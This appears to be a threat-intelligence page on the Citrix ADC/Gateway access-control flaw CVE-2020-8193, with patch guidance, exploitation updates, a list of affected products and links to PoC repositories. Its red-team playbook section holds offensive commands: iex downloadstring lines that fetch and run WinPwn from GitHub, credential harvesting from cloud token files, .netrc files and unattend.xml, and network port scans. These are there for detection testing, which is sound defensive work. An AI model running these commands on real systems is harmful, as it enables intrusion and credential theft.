CVE-2020-8193
Overview
This vulnerability is an improper access control flaw in Citrix ADC, Citrix Gateway, and Citrix SDWAN WAN-OP firmware versions prior to specified releases. The root cause lies in insufficient authentication enforcement on certain URL endpoints, allowing unauthenticated users to access protected resources. The affected components are web management interfaces and API endpoints handling session and file download requests.
Vulnerability Description
Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints.
Impact
An attacker can gain unauthorized access to sensitive server information and configuration data by exploiting the lack of authentication on critical endpoints. No user authentication or interaction is required to leverage this flaw. This unauthorized access may facilitate further exploitation, data leakage, or compromise of the affected systems, potentially leading to broader network infiltration or disruption of services.
Solution
Apply the patches provided by Citrix as detailed in advisory CTX276688. Upgrade Citrix ADC and Citrix Gateway to versions 13.0-58.30 or later, 12.1-57.18 or later, 12.0-63.21 or later, 11.1-64.14 or later, and 10.5-70.18 or later. For Citrix SDWAN WAN-OP, update to versions 11.1.1a, 11.0.3d, 10.2.7 or later. Refer to https://support.citrix.com/article/CTX276688 for complete patching instructions and additional mitigation guidance.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with improper access control in Citrix ADC and Citrix Gateway, as well as Citrix SDWAN WAN-OP, presents a significant security concern for organizations utilizing these products. This flaw allows unauthenticated users to access certain URL endpoints, potentially exposing sensitive information and administrative functionalities. The affected versions span multiple releases, indicating a widespread risk across various deployments. The root cause of this vulnerability lies in the failure to enforce proper authentication mechanisms, which should restrict access to critical resources. This oversight can lead to unauthorized actions that compromise the integrity and confidentiality of the systems.
Attack vectors for exploiting this vulnerability are relatively straightforward, as they do not require sophisticated techniques or insider knowledge. An attacker could leverage tools to send HTTP requests to the vulnerable endpoints, gaining access to functionalities that should be restricted to authenticated users. Scenarios may include retrieving sensitive configuration data, manipulating settings, or even launching further attacks against the network infrastructure. The simplicity of the exploitation process increases the likelihood of attacks, particularly from malicious actors who may scan for vulnerable systems on the internet.
The real-world impact of this vulnerability can be severe, especially for organizations that rely on Citrix solutions for application delivery and remote access. Unauthorized access could lead to data breaches, where sensitive information is exposed or manipulated. Additionally, attackers could exploit this vulnerability to pivot within the network, escalating their privileges and potentially gaining control over critical systems. The business risks associated with such incidents include reputational damage, regulatory penalties, and financial losses stemming from remediation efforts and potential litigation. Organizations may also face disruptions in service availability, affecting customer trust and operational continuity.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments and vulnerability scans can help identify affected systems and ensure that they are running supported versions of the software. Organizations should prioritize patch management, applying updates as soon as they are released by the vendor to close security gaps. Additionally, employing web application firewalls (WAFs) can provide an additional layer of protection by filtering and monitoring HTTP traffic to detect and block malicious requests targeting the vulnerable endpoints. Furthermore, implementing strict access controls and monitoring user activity can help detect unauthorized access attempts, allowing for a swift response to potential breaches.
In conclusion, the improper access control vulnerability in Citrix ADC, Citrix Gateway, and Citrix SDWAN WAN-OP represents a critical security risk that organizations must address proactively. By understanding the technical details, potential attack vectors, and real-world implications, businesses can better prepare themselves against exploitation. Through diligent detection and mitigation strategies, organizations can safeguard their infrastructure, protect sensitive data, and maintain the trust of their customers and stakeholders.
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2020-8193, evidenced by a surge in detection telemetry and the emergence of multiple new proof-of-concept exploit tools publicly available on GitHub. This development is underscored by the vulnerability’s recent inclusion in the CISA Known Exploited Vulnerabilities catalog, signaling increased recognition of its operational risk. The elevated EPSS score further corroborates the heightened likelihood of exploitation attempts in the wild. These changes collectively elevate the threat posture from a theoretical concern to an active exploitation scenario, increasing the urgency for defenders to prioritize monitoring and response efforts. The availability of diverse exploit code lowers the barrier for adversaries, potentially broadening the attacker base and accelerating exploitation timelines. Consequently, the risk assessment for CVE-2020-8193 has shifted to a medium-high level, reflecting its transition from a latent vulnerability to one with demonstrated active exploitation and tangible impact on affected Citrix products.
Update 2 — April 16, 2026
CSURFACE threat intelligence has observed a slight increase in detection activity related to CVE-2020-8193, indicating a modest rise in exploitation attempts targeting vulnerable Citrix ADC, Gateway, and SD-WAN WANOP appliances. Although the overall trend remains stable, this uptick suggests adversaries continue to probe these systems, leveraging publicly available proof-of-concept exploits that have proliferated across multiple open-source repositories. The persistence of these exploitation efforts, despite the vulnerability’s medium severity rating, underscores the ongoing risk posed by improper access control flaws in widely deployed network infrastructure. While there is no current evidence linking this vulnerability to ransomware campaigns, the sustained interest and accessibility of exploit tools maintain a consistent threat vector that defenders must monitor closely. Consequently, the threat level for CVE-2020-8193 remains at medium but with a heightened emphasis on active reconnaissance and exploitation attempts, reinforcing the need for vigilant detection and response capabilities.
Update 3 — July 03, 2026
CSURFACE threat intelligence has identified a slight increase in exploitation attempts targeting CVE-2020-8193, reflected by a modest uptick in detection activity across our sensors. While the overall exploitation trend remains stable without signs of rapid escalation, the persistence of publicly available proof-of-concept exploits continues to facilitate opportunistic scanning and unauthorized access attempts against vulnerable Citrix ADC and Gateway deployments. This subtle rise in activity underscores the ongoing attractiveness of this vulnerability to threat actors seeking to leverage improper access controls for network reconnaissance or lateral movement. Although no direct linkage to ransomware campaigns has emerged, the sustained exploitation interest maintains a consistent medium-level threat posture. Defenders should remain attentive to this incremental increase as it signals persistent adversary engagement rather than a transient anomaly, reinforcing the necessity for continuous monitoring and timely patch management to mitigate exposure.
Affected Products (13)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Citrix | Application Delivery Controller Firmware | All |
cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Application Delivery Controller Firmware | All |
cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Application Delivery Controller Firmware | All |
cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Application Delivery Controller Firmware | All |
cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Application Delivery Controller Firmware | All |
cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Netscaler Gateway Firmware | All |
cpe:2.3:o:citrix:netscaler_gateway_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Netscaler Gateway Firmware | All |
cpe:2.3:o:citrix:netscaler_gateway_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Netscaler Gateway Firmware | All |
cpe:2.3:o:citrix:netscaler_gateway_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Netscaler Gateway Firmware | All |
cpe:2.3:o:citrix:netscaler_gateway_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Gateway Firmware | All |
cpe:2.3:o:citrix:gateway_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Sd-Wan Wanop | All |
cpe:2.3:o:citrix:sd-wan_wanop:*:*:*:*:*:*:*:*
|
|
|
Citrix | Sd-Wan Wanop | All |
cpe:2.3:o:citrix:sd-wan_wanop:*:*:*:*:*:*:*:*
|
|
|
Citrix | Sd-Wan Wanop | All |
cpe:2.3:o:citrix:sd-wan_wanop:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (5)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
jas502n/CVE-2020-8193
Citrix ADC Vulns
|
jas502n | 88 | 20 | 2020-07-10 | View |
|
Airboi/Citrix-ADC-RCE-CVE-2020-8193
Citrix ADC从权限绕过到RCE
|
Airboi | 45 | 7 | 2020-07-12 | View |
|
PR3R00T/CVE-2020-8193-Citrix-Scanner
Scanning for CVE-2020-8193 - Auth Bypass check
|
PR3R00T | 8 | 3 | 2020-07-13 | View |
|
Zeop-CyberSec/citrix_adc_netscaler_lfi
This Metasploit-Framework module can be use to help companies to check the last Citrix vulnerability CVE-2020-8193, CVE-...
|
Zeop-CyberSec | 6 | 4 | 2020-07-12 | View |
|
ctlyz123/CVE-2020-8193
|
ctlyz123 | 2 | 3 | 2020-07-15 | View |
Threat Feed
32 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-8193 |
| support.citrix.com |
GitHub CVE
x_refsource_MISC
|
https://support.citrix.com/article/CTX276688 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-8193 |